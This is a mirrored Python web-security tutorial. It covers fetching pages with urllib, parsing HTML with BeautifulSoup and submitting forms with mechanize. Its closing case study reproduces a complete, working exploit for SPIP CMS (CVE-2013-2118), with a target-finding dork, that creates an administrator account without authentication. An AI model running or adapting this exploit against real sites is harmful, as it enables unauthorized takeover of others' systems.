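Python Tutorial: Web Security

Posted by wyzsk on 2020-08-19

Original URL: https://zhuanlan.kanxue.com/article-13154.htm

Author: lxj616 · 2014/07/21 11:20

0x00 Overview

Starting from sample code, this article explains the role Python plays in web security analysis, using the most basic examples to show how Python fetches, parses, and processes various kinds of web pages.

System environment: Kali + BeautifulSoup + mechanize. Because no low-level driver work is involved, the sample code can be used on any platform, provided the required packages are installed.

0x01 Fetching web pages with Python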

#!bash
Python 2.7.6 (default, Nov 10 2013, 19:24:24) [MSC v.1500 64 bit (AMD64)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import urllib

First, import urllib for the analysis that follows.

#!python
>>> httpResponse = urllib.urlopen("http://www.baidu.com")

Fetch an HTTP response, using Baidu as the example.

#!python
>>> httpResponse.code
200

The status is 200 OK.

#!python
>>> print httpResponse.read()[0:500]

To save space, only the first 500 bytes are shown.

<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.co

Take a look at the structure of the HTTP response.

#!python
>>> dir(httpResponse)
['__doc__', '__init__', '__iter__', '__module__', '__repr__', 'close', 'code', 'fileno', 'fp', 'getcode', 'geturl', 'headers', 'info', 'next', 'read', 'readline', 'readlines', 'url']

Check the URL that the response corresponds to.

#!python
>>> httpResponse.url
'http://www.baidu.com'

The internal structure of headers can be inspected the same way.

#!python
>>> dir(httpResponse.headers)
['__contains__', '__delitem__', '__doc__', '__getitem__', '__init__', '__iter__', '__len__', '__module__', '__setitem__', '__str__', 'addcontinue', 'addheader', 'dict', 'encodingheader', 'fp', 'get', 'getaddr', 'getaddrlist', 'getallmatchingheaders', 'getdate', 'getdate_tz', 'getencoding', 'getfirstmatchingheader', 'getheader', 'getheaders', 'getmaintype', 'getparam', 'getparamnames', 'getplist', 'getrawheader', 'getsubtype', 'gettype', 'has_key', 'headers', 'iscomment', 'isheader', 'islast', 'items', 'keys', 'maintype', 'parseplist', 'parsetype', 'plist', 'plisttext', 'readheaders', 'rewindbody', 'seekable', 'setdefault', 'startofbody', 'startofheaders', 'status', 'subtype', 'type', 'typeheader', 'unixfrom', 'values']
>>> httpResponse.headers.items()
[('bdqid', '0xeb89374a00028e2e'), ('x-powered-by', 'HPHP'), ('set-cookie', 'BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com'), ('expires', 'Tue, 15 Jul 2014 02:37:00 GMT'), ('vary', 'Accept-Encoding'), ('bduserid', '0'), ('server', 'BWS/1.1'), ('connection', 'Close'), ('cxy_all', 'baidu+776b3a548a71afebd09c6640f9af5559'), ('cache-control', 'private'), ('date', 'Tue, 15 Jul 2014 02:37:47 GMT'), ('p3p', 'CP=" OTI DSP COR IVA OUR IND COM "'), ('content-type', 'text/html; charset=utf-8'), ('bdpagetype', '1')]

Try a simple pass over the headers.

#!python
>>> for header,value in httpResponse.headers.items() :
    print header+':'+value    

bdqid:0xeb89374a00028e2e
x-powered-by:HPHP
set-cookie:BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com
expires:Tue, 15 Jul 2014 02:37:00 GMT
vary:Accept-Encoding
bduserid:0
server:BWS/1.1
connection:Close
cxy_all:baidu+776b3a548a71afebd09c6640f9af5559
cache-control:private
date:Tue, 15 Jul 2014 02:37:47 GMT
p3p:CP=" OTI DSP COR IVA OUR IND COM "
content-type:text/html; charset=utf-8
bdpagetype:1
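The transcript above runs on Python 2. As a rough Python 3 sketch of the same steps (status code, final URL, headers, first 500 bytes), the block below uses `urllib.request`. So that it runs without network access, it fetches from a throwaway local server rather than Baidu. `DemoHandler`, `fetch`, and the page body are illustrative names and data, not part of the original article.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class DemoHandler(BaseHTTPRequestHandler):
    """Hypothetical stand-in for a real site: always answers 200 with a tiny page."""

    def do_GET(self):
        body = b"<!DOCTYPE html><html><head><title>demo</title></head></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep the demo quiet


def fetch(url, limit=500):
    """Return (status, final_url, headers, first `limit` bytes decoded as UTF-8)."""
    # An empty ProxyHandler ignores any proxy configured in the environment.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=10) as resp:
        text = resp.read()[:limit].decode("utf-8", errors="replace")
        return resp.status, resp.geturl(), dict(resp.headers.items()), text


server = HTTPServer(("127.0.0.1", 0), DemoHandler)  # port 0: pick any free port
threading.Thread(target=server.serve_forever, daemon=True).start()
try:
    demo_url = "http://127.0.0.1:%d/" % server.server_port
    status, final_url, headers, text = fetch(demo_url)
finally:
    server.shutdown()
    server.server_close()

print(status)
for name, value in headers.items():
    print(name + ":" + value)
print(text)
```

Pointing `fetch` at a real site only requires changing the URL. In Python 3 the response exposes `status` where the Python 2 object above exposes `code`.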

#!python
>>> url = 'http://www.baidu.com/s?wd=df&rsv_spt=1'

This is the full URL used to fetch the page.

#!python
>>> base_url = 'http://www.baidu.com'

The base URL.

#!python
>>> args = {'wd':'df','rsv_spt':1}

Build the query parameters separately.

#!python
>>> encode_args = urllib.urlencode(args)

urlencode encodes the parameters into URL query-string form.

#!python
>>> fp2=urllib.urlopen(base_url+'/s?'+encode_args)

Fetch the web page again, this time with the URL assembled this way.

#!python
>>> print fp2.read()[0:500].decode("utf-8")

The page is UTF-8, so decode it explicitly to display the Chinese text.

<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>df_百度搜尋</title><style data-for="result" >body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing
>>>
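In Python 3 the same helper lives in `urllib.parse`. The sketch below rebuilds the URL from the steps above and then splits it apart again. It assumes Python 3.7 or later, where dicts keep insertion order, and the non-ASCII search term is an added illustration.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

base_url = "http://www.baidu.com"
args = {"wd": "df", "rsv_spt": 1}

# urlencode turns the dict into a query string; values are converted with
# str() and percent-encoded where needed.
query = urlencode(args)
url = base_url + "/s?" + query
print(url)

# Non-ASCII values are encoded as UTF-8 bytes first, then percent-escaped.
encoded_cn = urlencode({"wd": "百度"})
print(encoded_cn)

# Round trip: split the URL and decode the query string back into a dict.
decoded = parse_qs(urlsplit(url).query)
print(decoded)
```

Building the query from a dict instead of concatenating strings by hand keeps special characters such as `&`, `=`, and spaces inside a value from changing the meaning of the request.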

0x02 Parsing HTML pages with Python

First install BeautifulSoup: http://www.crummy.com/software/BeautifulSoup/

#!bash
~/Desktop/beautifulsoup4-4.3.2# python setup.py install
running install
running build
running build_py
creating build/lib.linux-x86_64-2.7
creating build/lib.linux-x86_64-2.7/bs4
copying bs4/dammit.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/testing.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/element.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/__init__.py -> build/lib.linux-x86_64-2.7/bs4
... (partially omitted) ...
copying bs4/diagnose.py -> build/lib.linux-x86_64-2.7/bs4
creating build/lib.linux-x86_64-2.7/bs4/builder
copying bs4/builder/_lxml.py -> build/lib.linux-x86_64-2.7/bs4/builder
copying bs4/builder/_htmlparser.py -> build/lib.linux-x86_64-2.7/bs4/builder
~/Desktop/beautifulsoup4-4.3.2#

Now bs4 is ready to use.

#!bash
~# python
Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from bs4 import BeautifulSoup

Import the bs4 package (installed in the previous step).

#!python
>>> import urllib
>>> html = urllib.urlopen('http://www.baidu.com')
>>> html.code
200
>>> bt = BeautifulSoup(html.read(),"lxml")

The lxml parser apparently ships with Kali; installing it yourself on Windows is more of a hassle.

#!python
>>> bt.title

The page title.

#!python
<title>百度一下，你就知道</title>
>>> bt.title.string
u'\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053'
>>> bt.meta
<meta content="text/html;charset=utf-8" http-equiv="content-type"/>
>>> bt.meta.next
<meta content="IE=Edge" http-equiv="X-UA-Compatible"/>
>>> bt.meta.next.next
<link href="//s1.bdstatic.com" rel="dns-prefetch"/>
>>> allMetaTags = bt.find_all('meta')

Find all meta tags.

#!python
>>> allMetaTags
[<meta content="text/html;charset=utf-8" http-equiv="content-type"/>, <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>, <meta content="0; url=/baidu.html?from=noscript" http-equiv="refresh"/>]
>>> allMetaTags[0]
<meta content="text/html;charset=utf-8" http-equiv="content-type"/>

>>> allLinks = bt.find_all('a')

Find all a tags (links).

#!python
>>> allLinks[0]
<a href="http://www.baidu.com/gaoji/preferences.html" onmousedown="return user_c({'fm':'set','tab':'setting','login':'0'})">搜尋設定</a>
>>> allLinks[1]
<a href="/" id="btop" onmousedown="return user_c({'fm':'set','tab':'index','login':'0'})">百度首頁</a>

>>> for link in allLinks:
...     print link['href']
...

Try a simple pass that prints each link's href.

http://www.baidu.com/gaoji/preferences.html
https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
http://news.baidu.com/ns?cl=2&rn=20&tn=news&word=
http://tieba.baidu.com/f?kw=&fr=wwwt
http://zhidao.baidu.com/q?ct=17&pn=0&tn=ikaslist&rn=10&word=&fr=wwwt
http://music.baidu.com/search?fr=ps&key=
http://image.baidu.com/i?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&word=
http://v.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=
http://map.baidu.com/m?word=&fr=ps01000
http://wenku.baidu.com/search?word=&lm=0&od=0
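For readers without bs4 or lxml installed, roughly the same tag collection can be sketched with the standard library's `html.parser` in Python 3. This is a substitute technique, not BeautifulSoup itself. `TagCollector`, `find_all`, and the `SAMPLE` fragment are hypothetical, loosely modeled on the output above. The sketch also resolves relative links such as `/` against the base URL and skips `a` tags without an `href`; in bs4, `link['href']` raises `KeyError` for such a tag, while `link.get('href')` returns `None`.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class TagCollector(HTMLParser):
    """Collect the attributes of every start tag with the given name."""

    def __init__(self, wanted):
        super().__init__()
        self.wanted = wanted
        self.found = []

    def handle_starttag(self, tag, attrs):
        # Self-closing tags such as <meta .../> also arrive here by default.
        if tag == self.wanted:
            self.found.append(dict(attrs))


def find_all(html, tag):
    """Return one attribute dict per occurrence of `tag` in `html`."""
    collector = TagCollector(tag)
    collector.feed(html)
    collector.close()
    return collector.found


# Hypothetical page fragment for illustration only.
SAMPLE = """
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<a href="http://www.baidu.com/gaoji/preferences.html">settings</a>
<a href="/" id="btop">home</a>
<a name="anchor-without-href">no link here</a>
"""

base = "http://www.baidu.com"
links = [urljoin(base, a["href"]) for a in find_all(SAMPLE, "a") if "href" in a]
metas = find_all(SAMPLE, "meta")

for link in links:
    print(link)
print(metas[0]["content"])
```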

0x03 Handling forms with Python + mechanize

#!bash
~# python
Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import mechanize

Import mechanize.

#!python
>>> br = mechanize.Browser()

Create a browser instance.

#!python
>>> br.open('http://www.17173.com')

Open a page that contains forms.

#!python
<response_seek_wrapper at 0x248db90 whose wrapped object = <closeable_response at 0x248d098 whose fp = <socket._fileobject object at 0x1f868d0>>>

>>> for form in br.forms():
...     print form
... 

<GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(keyword=��������)>
  <SubmitControl(<None>=����) (readonly)>>
<searchask GET http://search.17173.com/jsp/game.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(<None>=)>
  <TextControl(<None>=)>>
<voteform POST http://vote.17173.com/action/vote_process.php application/x-www-form-urlencoded
  <HiddenControl(vote_id=9624) (readonly)>
  <HiddenControl(vote_year=) (readonly)>
  <CheckboxControl(vote_item_9624[]=[49649, 49650, 49651, 49652, 49653, 49654, 49655, 49656])>
  <SubmitControl(<None>=) (readonly)>>
<GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(keyword=��������)>
  <SubmitControl(<None>=����) (readonly)>>
>>> 

>>> br.select_form(nr=0)

Select the form to work with (here the first one, nr=0).

#!python
>>> br.form['keyword']='2013'

Set the value of a form field (the TextControl).

#!python
>>> br.submit()

Simulate a browser submitting the form.

#!python
<response_seek_wrapper at 0x248dab8 whose wrapped object = <closeable_response at 0x249d950 whose fp = <socket._fileobject object at 0x243e5d0>>>
>>> br
<mechanize._mechanize.Browser instance at 0x242ff38>
>>>
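To make the submit step less opaque: for a GET form, submitting amounts to requesting the form's action URL with the named fields appended as a query string. The Python 3 sketch below rebuilds that URL by hand from the first form printed above. It is an approximation under stated assumptions, not mechanize's actual implementation. `build_get_url` is a hypothetical helper, the action URL is assumed to carry no query string of its own, and the unnamed submit control is assumed to contribute nothing.

```python
from urllib.parse import urlencode

# Values copied from the first form listed above.
action = "http://search.17173.com/jsp/news_press.jsp"
fields = [("charset", "gbk"), ("keyword", "2013")]


def build_get_url(action, fields, encoding="utf-8"):
    """Return the URL a GET form submission would request (sketch)."""
    return action + "?" + urlencode(fields, encoding=encoding)


plain_url = build_get_url(action, fields)
print(plain_url)

# The hidden charset=gbk field suggests the server expects GBK-encoded text,
# so a non-ASCII keyword would probably need that encoding (an assumption).
gbk_url = build_get_url(action, [("charset", "gbk"), ("keyword", "游戏")], encoding="gbk")
utf8_url = build_get_url(action, [("charset", "gbk"), ("keyword", "游戏")])
print(gbk_url)
print(utf8_url)
```

Seeing the request as a plain URL makes it easier to replay or modify it with urllib alone when mechanize is not available.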

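0x04 Case study

Below is an exploit for a CMS vulnerability in which the administrator password can be recovered without authorization. The original author's information is retained in full.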

#!python
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.

'''
import urllib, urllib2
import cookielib
import sys
import re

def send_request(urlOpener, url, post_data=None):
   # Send a request to url (POST when post_data is given)
   request = urllib2.Request(url)
   # Use urllib2 to handle the HTTP request
   url = urlOpener.open(request, post_data)
   return url.read()

if len(sys.argv) < 4:
   # Print a short usage hint
   print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
   exit()

base_url = sys.argv[1]
# Base URL of the site
login = sys.argv[2]
# Login name to register
mail = sys.argv[3]
# Mailbox that receives the email sent by the unauthorized request

cookiejar = cookielib.CookieJar()
# Handle cookies so both requests share one session identity
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))


formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
# Send the first HTTP request


m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)

# Locate the target form field

m = re.search("(?<=value=')[\w\+/=]*",m.group(0));


formulaire_data = {'var_ajax' : 'form',
                   'page' : 'identifiants',
                   'mode' : '0minirezo',
                   'formulaire_action' : 'inscription',
                   'formulaire_action_args' : m.group(0),
                   'nom_inscription' : login,
                   'mail_inscription' : mail,
                   'nobot' : ''
                  }
# Build the request parameters
formulaire_data = urllib.urlencode(formulaire_data)
# URL-encode them


send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"


print "[+] You should receive an email with credentials soon :) "
# Once the second request has been sent, the goal has been achieved
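The two `re.search` calls in the script are its least obvious part, so here they are in isolation as a Python 3 sketch. The HTML fragment and the token value are made up for illustration. Raw strings are used because Python 3 warns about escapes such as `\w` in ordinary string literals.

```python
import re

# Hypothetical form fragment; the token value is invented for this example.
sample = (
    "<form method='post'>\n"
    "<input name='formulaire_action_args' type='hidden'\n"
    "value='QWxhZGRpbjpvcGVu+/c2VzYW1l==' />\n"
    "</form>"
)

# Step 1: grab the <input ...> tag up to, but not including, its closing '>'.
tag = re.search(r"<input name='formulaire_action_args' type='hidden'\n[^>]*", sample)

# Step 2: the lookbehind (?<=value=') anchors the match right after "value='"
# without consuming it, so group(0) holds only the token characters.
token = re.search(r"(?<=value=')[\w+/=]*", tag.group(0))
hidden_value = token.group(0)
print(hidden_value)
```

Note that `re.search` returns `None` when nothing matches, so the script as written would raise `AttributeError` on a page whose markup differs from this pattern. Checking the result before calling `group` would make such a failure easier to diagnose.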

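This article comes from the WooYun knowledge base. This mirror is provided for study and research; copyright belongs to the WooYun knowledge base.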
